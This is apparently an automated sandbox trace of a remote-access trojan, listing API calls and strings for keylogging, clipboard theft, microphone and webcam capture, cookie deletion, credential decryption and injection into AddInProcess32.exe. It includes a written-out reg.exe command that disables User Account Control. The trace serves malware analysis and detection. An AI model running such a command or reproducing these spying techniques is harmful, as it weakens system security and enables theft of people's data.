                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                                                                  • API ID: InputSend
                                                                                  APIs
                                                                                  • OpenClipboard.USER32 ref: 00414F41
                                                                                  • EmptyClipboard.USER32 ref: 00414F4F
                                                                                  • CloseClipboard.USER32 ref: 00414F55
                                                                                  • OpenClipboard.USER32 ref: 00414F5C
                                                                                  • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                                                                  • CloseClipboard.USER32 ref: 00414F84
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                  APIs
                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                                                                  • __fassign.LIBCMT ref: 00447814
                                                                                  • __fassign.LIBCMT ref: 0044782F
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                                                                  • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                  APIs
                                                                                  • _strftime.LIBCMT ref: 00401D30
                                                                                    • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                                  • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                                                                  • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                                                                  • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                  • String ID: %Y-%m-%d %H.%M$.wav
                                                                                  APIs
                                                                                    • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                    • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                    • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00419407
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                                                                  Strings
                                                                                  • http://geoplugin.net/json.gp, xrefs: 004193A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                                  • String ID: http://geoplugin.net/json.gp
                                                                                  APIs
                                                                                    • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                                                                  • _free.LIBCMT ref: 0044E128
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 0044E133
                                                                                  • _free.LIBCMT ref: 0044E13E
                                                                                  • _free.LIBCMT ref: 0044E192
                                                                                  • _free.LIBCMT ref: 0044E19D
                                                                                  • _free.LIBCMT ref: 0044E1A8
                                                                                  • _free.LIBCMT ref: 0044E1B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                                                                  • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  APIs
                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                                                                  • GetLastError.KERNEL32 ref: 0040AA28
                                                                                  Strings
                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                                                                  • [Chrome Cookies not found], xrefs: 0040AA42
                                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                                                                  • UserProfile, xrefs: 0040A9EE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: DeleteErrorFileLast
                                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                  APIs
                                                                                  • __allrem.LIBCMT ref: 00438A09
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                                                                  • __allrem.LIBCMT ref: 00438A3C
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                                                                  • __allrem.LIBCMT ref: 00438A71
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: __cftoe
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: __freea$__alloca_probe_16_free
                                                                                  • String ID: a/p$am/pm
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                                                                  • int.LIBCPMT ref: 0040F8D7
                                                                                    • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                                    • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040F917
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                                                                  • __Init_thread_footer.LIBCMT ref: 0040F97F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                  • _free.LIBCMT ref: 0044575C
                                                                                  • _free.LIBCMT ref: 00445784
                                                                                  • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                  • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                  • _abort.LIBCMT ref: 004457A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  APIs
                                                                                  • RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                                  • GetLastError.KERNEL32 ref: 0041B335
                                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                                  • String ID: 0$MsgWindowClass
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                                                                    • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00437631
                                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                  • String ID: /zC
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                                                                  • API ID: MetricsSystem
                                                                                  • String ID: ]tA
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                                                                  Strings
                                                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                                                                  • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                                                                  • API ID: CloseHandle$CreateProcess
                                                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 0044085A
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 00440890
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  Strings
                                                                                  • Connection KeepAlive | Disabled, xrefs: 004050D9
                                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                  • String ID: Connection KeepAlive | Disabled
                                                                                  APIs
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                                                                  • Sleep.KERNEL32(00002710), ref: 00418DBD
                                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                  • String ID: Alarm triggered
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000,0040BE20), ref: 004044A4
                                                                                    • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                                                                                  • API ID: H_prologSleep
                                                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                  APIs
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  • _free.LIBCMT ref: 00442318
                                                                                  • _free.LIBCMT ref: 0044232F
                                                                                  • _free.LIBCMT ref: 0044234E
                                                                                  • _free.LIBCMT ref: 00442369
                                                                                  • _free.LIBCMT ref: 00442380
                                                                                  • API ID: _free$AllocateHeap
                                                                                  APIs
                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                                                                  • _free.LIBCMT ref: 004468EC
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 00446AB8
                                                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                  APIs
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6), ref: 0044E359
                                                                                  • __alloca_probe_16.LIBCMT ref: 0044E391
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?), ref: 0044E3E2
                                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?,00000002,00000000), ref: 0044E3F4
                                                                                  • __freea.LIBCMT ref: 0044E3FD
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                                                                  • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                                                                  • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                                                                  • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                                                                  • waveInStart.WINMM ref: 00401CDE
                                                                                  Similarity
                                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                                                                  • _free.LIBCMT ref: 0044C59F
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                                                                  Similarity
                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                                                                  • int.LIBCPMT ref: 0040FBE8
                                                                                    • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                                    • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004457AE
                                                                                  • _free.LIBCMT ref: 004457E3
                                                                                  • _free.LIBCMT ref: 0044580A
                                                                                  • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445817
                                                                                  • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445820
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0044DBB4
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 0044DBC6
                                                                                  • _free.LIBCMT ref: 0044DBD8
                                                                                  • _free.LIBCMT ref: 0044DBEA
                                                                                  • _free.LIBCMT ref: 0044DBFC
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00441566
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 00441578
                                                                                  • _free.LIBCMT ref: 0044158B
                                                                                  • _free.LIBCMT ref: 0044159C
                                                                                  • _free.LIBCMT ref: 004415AD
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Enum$InfoQueryValue
                                                                                  • String ID: [regsplt]
                                                                                  APIs
                                                                                  • _strpbrk.LIBCMT ref: 0044B918
                                                                                  • _free.LIBCMT ref: 0044BA35
                                                                                    • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,004050E3,?,00000000,00000000,00402086,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                                                                                    • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417,?,004050E3), ref: 00439AC7
                                                                                    • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000,?,004050E3), ref: 00439ACE
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                  • String ID: *?$.
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: __alloca_probe_16__freea
                                                                                  • String ID: H"G$H"GH"G
                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 0040189E
                                                                                  • ExitThread.KERNEL32 ref: 004018D6
                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                                                                    • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                  • String ID: 8:G
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00440975
                                                                                  • _free.LIBCMT ref: 00440A40
                                                                                  • _free.LIBCMT ref: 00440A4A
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _free$FileModuleName
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  • API String ID: 2506810119-760905667
                                                                                  APIs
                                                                                    • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                                                    • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                                                    • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                                                    • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
                                                                                  • _wcslen.LIBCMT ref: 00419744
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                  • String ID: .exe$program files (x86)\$program files\
                                                                                  • API String ID: 37874593-1203593143
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                  • wsprintfW.USER32 ref: 0040A13F
                                                                                    • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                                  Similarity
                                                                                  • API ID: EventLocalTimewsprintf
                                                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                  • API String ID: 1497725170-1359877963
                                                                                  APIs
                                                                                    • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                    • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 00409EB7
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 00409EC3
                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                                                                  Similarity
                                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                                  • String ID: Online Keylogger Started
                                                                                  • API String ID: 112202259-1258561607
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: CryptUnprotectData$crypt32
                                                                                  • API String ID: 2574300362-2380590389
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
